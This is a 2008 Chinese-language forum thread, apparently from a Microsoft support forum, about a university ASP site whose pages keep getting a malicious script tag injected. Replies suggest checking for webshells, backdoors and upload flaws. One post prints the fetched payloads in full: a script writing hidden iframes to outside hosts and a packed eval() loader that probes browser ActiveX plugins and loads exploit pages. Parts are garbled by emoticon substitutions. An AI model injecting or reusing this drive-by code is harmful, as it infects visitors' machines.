none
大学网站出现了一些恶意代码 RRS feed

  • 问题

  •  

    上个星期帮助一个大学进行IIS排错,大学的工作人员跟我讲,他们的门户站点中了病毒,后缀为.asp的网页中都会有一串恶意代码,我当时进行了系统全盘格式化,然后重新安装操作系统,进行打补钉,安装IIS后,导入网站目录了。但是还是没有解决实际问题,网站中还是有这些代码。这时我认为和操作系统没多大关系,还是网站目录内文件被感染了。现在我把网页中的代码提供给大家,请大家分析一下,用什么方法能解决此现象。

    <script language="javascript" src="http://51yes.ocry.com/click2.js?id=259865365&logo=1"></script>

     

    2008年4月10日 2:23

答案

  • 你好:

    建议楼主如下操作

    1 ,先考虑该站点内是否留有后门,webshell等,通常核客是webshell对web进程管理。

    所以建议楼主查一下.

    2,查看主机的是否留有后门,比如3389什么的。核客在得到用户服务器权限之后,会利用已知的端口或自己开启一个端口

    做远程管理,比如3389 4899.pcanywhere等

     

    3,如果有虚拟主机,千万要对别的站点也要查下,安装些杀毒软件。

     

    在以上过程中检测未有后门等不安全因素后。

    可以考虑一下arp挂马。

    2008年4月16日 5:19

全部回复

  • 我觉得要从几方面着手。

    1、清除运行中的恶意进程,你重装系统基本上可以解决这个问题。

    2、检察这段恶意脚本是否已经被物理的加到了你的网站的asp页面文件中。如果是的话,手工都删除掉。

    3、做好上面2步之后,做好防范工作,比如装好一些优秀的杀毒软件和杀流氓软件,并及时更新。

    4、这种恶意脚本有时候并不是因为服务器被感染导致的,有时候是因为客户端被感染导致的。我以前遇到过这种情况,客户端浏览页面也是被挂了恶意脚本,但是查遍服务器也没有找到什么可疑的地方,最后发现是客户端多台电脑感染了恶意程序。所以最好对有这种问题的客户端的电脑抽样检查一下。

     

    2008年4月10日 4:46
  • 第一步重装系统已经做过了,但是还有,因为原网站目录里就有。第二步进行手工删除,ASP文件太多,可能有上千个,这样劳动量太大了。装了单机版的mcafee杀毒软件,是不是要装个服务版的杀毒软件。

    2008年4月11日 11:46
  • 这种情况是网站里面被人上传了asp程序造成的,主要是因为程序存在漏洞,如FSO文件上传了asp等程序,

    解决的办法是将所有的asp程序替换成备份时的状态。或者找些木马专杀工具清理,清理完毕后,查找程序的漏洞并进行相应的修改,主要通过文件上传途径上传的。

    2008年4月11日 13:39
    版主
  •  

      前段时间是另一段script代码,都是凌晨1,2点或者早上6,7点钟被挂上。感染asp,htm,jsp,文件,并不是全部,主要是是核心文件,如首页index.asp,数据库连接conn.asp,top.htm,等。
      记忆中是:<script language="javascript" src="http://51yes.dns04.com/click2.js?id=某号段,和下面的不一样&logo=1"></script>
      替换为空后依然每天再次被挂,由于一时找不到漏洞,采取了用注释无效的替换了这段代码,没有再发生注入。
      估计是某程序会自动检测,有这段代码则不加。
      这样维持了有1个星期,页面太多也没有细致查,就凑活着用了。
      
      
      但最近几天又出现了类似于“病毒变种”的这段代码
      
      <script language="javascript" src="http://51yes.ocry.com/click2.js?id=259865365&logo=1"></script>
      
      搜索了下资料,用百度直接没信息,g.cn搜索出简单几条。
      http://www.google.cn/search?hl=zh-CN&q=%3Cscript+language%3D%22javascript%22+src%3D%22http%3A%2F%2F51yes.ocry.com%2Fclick2.js%3Fid%3D259865365%26logo%3D1%22%3E%3C%2Fscript%3E+&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f
      
      下载下这个可恶的代码,查看如下:
      
      1,首先调用click2.js文件
      文件内容为:var cookieString = new String(document.cookie);
      var cookieHeader = 'ises' ;
      var Then = new Date();
      Then.setTime(Then.getTime() + 30*60*1000 );
      var beginPosition = cookieString.indexOf(cookieHeader);
      if (beginPosition == -1)
       {
       document.write('<iframe height="0" frameborder="1" src="http://59gua.com/page/add_54738542.htm" width="10" ></iframe>');
       document.write('<iframe height="0" frameborder="1" src="http://51yes.ocry.com/click2.htm" width="10" ></iframe>');
       document.cookie = "Cookieak=ises;expires="+ Then.toGMTString() +";path=/";
       }
      好像是设置好时间?我不大懂,还调用令两个郁闷的页面。
      
      2,一个是addr.js 内容为:
      eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=kCoffee||e(c);k=[function(e){return dEmail}];e=function(){return'\\w+'};c=1};while(c--)if(kCoffee)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),kCoffee);return p}('p="((o*";q n=h 18();n.17(n.16()+15*D*D*13);q C=h 12(3.y);q B="x=";4(C.A(B)==-1){j{4(11.10.Z().A("z"+"Y 7")==-1)3.f(\'<2 c=l:b a="9://8.5/z.k"></2>-Tongue Tiedpecial:2:-)}i(e){}3.y="x=X;W="+n.V();j{4(h m("U.T"))3.f(-Tongue Tiedpecial:2:-<2 c=l:b a="9://8.5/S.k"></2>-Tongue Tiedpecial:2:-)}i(e){}j{u=h m("w"+"v"+".w"+"v.1");4(u.R("Q")<="6.0.14.P"){3.f(-Tongue Tiedpecial:2:-<2 c=d-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-t-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-s:b a="9://8.5/r-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-O.g-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-4"></2>-Tongue Tiedpecial:2:-);p="((o*"}N{3.f(-Tongue Tiedpecial:2:-<2 c=d-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-t-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-s:b a="9://8.5/r-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-M.g-Tongue Tiedpecial:2:-+-Tongue Tiedpecial:2:-4"></2>-Tongue Tiedpecial:2:-)}}i(e){}p="((o*";j{4(h m("L.K"+"J"+"I.1"))3.f(-Tongue Tiedpecial:2:-<2 c=l:b a="9://8.5/H.k"></2>-Tongue Tiedpecial:2:-)}i(e){}j{4(h m("G.F.1"))3.f(-Tongue Tiedpecial:2:-<2 c=l:b a="9://8.5/E.k"></2>-Tongue Tiedpecial:2:-)}i(e){}}',62,71,'||iframe|document|if|com|||08usonline|http|src|none|style|||write||new|catch|try|gif|display|ActiveXObject|Then|5555555555556356653463463|dddddddddddddddddd|var||lay|isp|Link|PCtl|IER|Cookie1|cookie|ms|indexOf|cookieHeader|fdsafasdfasdfcookie|60|bd|Tool|BaiduBar|bf|layer|ormP|St|MPS|eal_new|else|eal|552|PRODUCTVERSION|PlayerProperty|xl|Vod|DPClient|toGMTString|expires|POPWINDOS|ie|toLowerCase|userAgent|navigator|String|1000||24|getTime|setTime|Date'.split('|'),0,{}))
      
      一个是1542776.js
      // A Popular Free Statistics Service for 100 000+ Webmasters.
      window.onerror=function(){return true};
      document.write ('<script>var a2776tf="51la";var a2776pu="";var a2776pf="51la";var a2776su=window.location;var a2776sf=document.referrer;var a2776of="";var a2776op="";var a2776ops=1;var a2776ot=1;var a2776d=new Date();var a2776color="";if (navigator.appName=="Netscape"){a2776color=screen.pixelDepth;} else {a2776color=screen.colorDepth;}<\/script><script>a2776tf=top.document.referrer;<\/script><script>a2776pu =window.parent.location;<\/script><script>a2776pf=window.parent.document.referrer;<\/script><script>a2776ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a2776ops=(a2776ops==null)?1: (parseInt(unescape((a2776ops)[2]))+1);var a2776oe =new Date();a2776oe.setTime(a2776oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a2776ops+ ";path=/;expires="+a2776oe.toGMTString();a2776ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a2776ot==null){a2776ot=1;}else{a2776ot=parseInt(unescape((a2776ot)[2])); a2776ot=(a2776ops==1)?(a2776ot+1)a2776ot);}a2776oe.setTime(a2776oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a2776ot+";path=/;expires="+a2776oe.toGMTString();<\/script><script>a2776of=a2776sf;if(a2776pf!=="51la"){a2776of=a2776pf;}if(a2776tf!=="51la"){a2776of=a2776tf;}a2776op=a2776pu;try{lainframe}catch(e){a2776op=a2776su;}document.write(-Tongue Tiedpecial:2:-<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=37&id=1542776&tpages=-Tongue Tiedpecial:2:-+a2776ops+-Tongue Tiedpecial:2:-&ttimes=-Tongue Tiedpecial:2:-+a2776ot+-Tongue Tiedpecial:2:-&tzone=-Tongue Tiedpecial:2:-+(0-a2776d.getTimezoneOffset()/60)+-Tongue Tiedpecial:2:-&tcolor=-Tongue Tiedpecial:2:-+a2776color+-Tongue Tiedpecial:2:-&sSize=-Tongue Tiedpecial:2:-+screen.width+-Tongue Tiedpecial:2:-,-Tongue Tiedpecial:2:-+screen.height+-Tongue Tiedpecial:2:-&referrer=-Tongue Tiedpecial:2:-+escape(a2776of)+-Tongue Tiedpecial:2:-&vpage=-Tongue Tiedpecial:2:-+escape(a2776op)+-Tongue Tiedpecial:2:-" \/>-Tongue Tiedpecial:2:-);<\/script>');
      
      
      有没有朋友碰到过这个东西?查询了好多资料,都断定是服务器上的程序有漏洞,现在正在用排除法解决。
      但会不会还有其他感染原因,代码如何这么“顽固”,在此请教如何根除。
    2008年4月12日 22:18
  •  

    开网站的朋友是不是最近老被51yes.dns04.com挂马?有什么好方法能预防或治理,请发表在下方:

    网马代码:<script language="javascript" src="http://51yes.dns04.com/click.js?id=239404362&logo=1"></script>
    木马变种:<script language="javascript" src="http://51yes.ocry.com/click2.js?id=259865365&logo=1"></script>

    期待中……

    2008年4月12日 22:20
  • 是啊,最近老是这样,昨天刚批量替换先用着,第二天早上就又被攻击了。都烦死了。前天查了些资料尽然没有好的解决方法。请问那位可以帮帮忙啊。

    2008年4月16日 1:48
  • 你好:

    建议楼主如下操作

    1 ,先考虑该站点内是否留有后门,webshell等,通常核客是webshell对web进程管理。

    所以建议楼主查一下.

    2,查看主机的是否留有后门,比如3389什么的。核客在得到用户服务器权限之后,会利用已知的端口或自己开启一个端口

    做远程管理,比如3389 4899.pcanywhere等

     

    3,如果有虚拟主机,千万要对别的站点也要查下,安装些杀毒软件。

     

    在以上过程中检测未有后门等不安全因素后。

    可以考虑一下arp挂马。

    2008年4月16日 5:19
  •  

    最近我也中了这个....
    2008年4月20日 11:09